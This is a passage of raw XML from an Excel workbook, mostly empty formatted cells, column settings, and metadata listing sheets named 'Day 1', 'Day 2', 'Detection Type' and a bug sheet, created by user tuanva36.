      <c r="M5" s="50"/>
      <c r="N5" s="50"/>
      <c r="O5" s="50"/>
      <c r="P5" s="50"/>
      <c r="Q5" s="50"/>
      <c r="R5" s="50"/>
      <c r="S5" s="50"/>
      <c r="T5" s="50"/>
      <c r="U5" s="50"/>
      <c r="V5" s="50"/>
      <c r="W5" s="50"/>
      <c r="X5" s="50"/>
      <c r="Y5" s="50"/>
      <c r="Z5" s="50"/>
      <c r="AA5" s="50"/>
    </row>
    <row r="6" spans="1:27" x14ac:dyDescent="0.25">
      <c r="A6" s="50"/>
      <c r="B6" s="50"/>
      <c r="C6" s="50"/>
      <c r="D6" s="50"/>
      <c r="E6" s="50"/>
      <c r="F6" s="50"/>
      <c r="G6" s="50"/>
      <c r="H6" s="50"/>
      <c r="I6" s="50"/>
      <c r="J6" s="50"/>
      <c r="K6" s="50"/>
      <c r="L6" s="50"/>
      <c r="M6" s="50"/>
      <c r="N6" s="50"/>
      <c r="O6" s="50"/>
      <c r="P6" s="50"/>
      <c r="Q6" s="50"/>
      <c r="R6" s="50"/>
      <c r="S6" s="50"/>
      <c r="T6" s="50"/>
      <c r="U6" s="50"/>
      <c r="V6" s="50"/>
      <c r="W6" s="50"/>
      <c r="X6" s="50"/>
      <c r="Y6" s="50"/>
      <c r="Z6" s="50"/>
      <c r="AA6" s="50"/>
    </row>
    <row r="7" spans="1:27" x14ac:dyDescent="0.25">
      <c r="A7" s="50"/>
      <c r="B7" s="50"/>
      <c r="C7" s="50"/>
      <c r="D7" s="50"/>
      <c r="E7" s="50"/>
      <c r="F7" s="50"/>
      <c r="G7" s="50"/>
      <c r="H7" s="50"/>
      <c r="I7" s="50"/>
      <c r="J7" s="50"/>
      <c r="K7" s="50"/>
      <c r="L7" s="50"/>
      <c r="M7" s="50"/>
      <c r="N7" s="50"/>
      <c r="O7" s="50"/>
      <c r="P7" s="50"/>
      <c r="Q7" s="50"/>
      <c r="R7" s="50"/>
      <c r="S7" s="50"/>
      <c r="T7" s="50"/>
      <c r="U7" s="50"/>
      <c r="V7" s="50"/>
      <c r="W7" s="50"/>
      <c r="X7" s="50"/>
      <c r="Y7" s="50"/>
      <c r="Z7" s="50"/>
      <c r="AA7" s="50"/>
    </row>
    <row r="8" spans="1:27" x14ac:dyDescent="0.25">
      <c r="A8" s="50"/>
      <c r="B8" s="50"/>
      <c r="C8" s="50"/>
      <c r="D8" s="50"/>
      <c r="E8" s="50"/>
      <c r="F8" s="50"/>
      <c r="G8" s="50"/>
      <c r="H8" s="50"/>
      <c r="I8" s="50"/>
      <c r="J8" s="50"/>
      <c r="K8" s="50"/>
      <c r="L8" s="50"/>
      <c r="M8" s="50"/>
      <c r="N8" s="50"/>
      <c r="O8" s="50"/>
      <c r="P8" s="50"/>
      <c r="Q8" s="50"/>
      <c r="R8" s="50"/>
      <c r="S8" s="50"/>
      <c r="T8" s="50"/>
      <c r="U8" s="50"/>
      <c r="V8" s="50"/>
      <c r="W8" s="50"/>
      <c r="X8" s="50"/>
      <c r="Y8" s="50"/>
      <c r="Z8" s="50"/>
      <c r="AA8" s="50"/>
    </row>
    <row r="9" spans="1:27" x14ac:dyDescent="0.25">
      <c r="A9" s="50"/>
      <c r="B9" s="50"/>
      <c r="C9" s="50"/>
      <c r="D9" s="50"/>
      <c r="E9" s="50"/>
      <c r="F9" s="50"/>
      <c r="G9" s="50"/>
      <c r="H9" s="50"/>
      <c r="I9" s="50"/>
      <c r="J9" s="50"/>
      <c r="K9" s="50"/>
      <c r="L9" s="50"/>
      <c r="M9" s="50"/>
      <c r="N9" s="50"/>
      <c r="O9" s="50"/>
      <c r="P9" s="50"/>
      <c r="Q9" s="50"/>
      <c r="R9" s="50"/>
      <c r="S9" s="50"/>
      <c r="T9" s="50"/>
      <c r="U9" s="50"/>
      <c r="V9" s="50"/>
      <c r="W9" s="50"/>
      <c r="X9" s="50"/>
      <c r="Y9" s="50"/>
      <c r="Z9" s="50"/>
      <c r="AA9" s="50"/>
    </row>
    <row r="10" spans="1:27"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c r="AA10" s="50"/>
    </row>
    <row r="11" spans="1:27"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spans="1:27"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spans="1:27"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spans="1:27"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spans="1:27"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spans="1:27"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spans="1:27"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spans="1:27"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row>
    <row r="19" spans="1:27"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spans="1:27"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row r="21" spans="1:27"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row>
    <row r="22" spans="1:27"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row>
    <row r="23" spans="1:27"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row>
    <row r="24" spans="1:27"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row>
    <row r="25" spans="1:27"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row>
    <row r="26" spans="1:27"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row>
    <row r="27" spans="1:27"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row>
    <row r="28" spans="1:27"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row>
    <row r="29" spans="1:27"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row>
    <row r="30" spans="1:27"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row>
    <row r="31" spans="1:27"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27"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row>
    <row r="33" spans="1:27"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row>
    <row r="34" spans="1:27"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row>
    <row r="35" spans="1:27"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row>
    <row r="36" spans="1:27"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row>
    <row r="37" spans="1:27"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row>
  </sheetData>
  <mergeCells count="1">
    <mergeCell ref="A1:AA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9" sqref="B19"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="22" customWidth="1"/>
    <col min="2" max="2" width="68.85546875" customWidth="1"/>
    <col min="3" max="3" width="90.42578125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A1" s="25" t="s">
        <v>699</v>
      </c>
      <c r="B1" s="25" t="s">
        <v>372</v>
      </c>
      <c r="C1" s="26" t="s">
        <v>378</v>
      </c>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A2" s="19"/>
      <c r="B2" s="19"/>
      <c r="C2" s="19"/>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A3" s="19"/>
      <c r="B3" s="19"/>
      <c r="C3" s="19"/>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A4" s="19"/>
      <c r="B4" s="19"/>
      <c r="C4"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Day 1</vt:lpstr>
      <vt:lpstr>Day 2</vt:lpstr>
      <vt:lpstr>Detection Type</vt:lpstr>
      <vt:lpstr>Bug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tuanva36</dc:creator>
  <cp:lastModifiedBy>tuanva36</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-08T03:05:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-26T10:29:15Z</dcterms:modified>
</cp:coreProperties>
</file>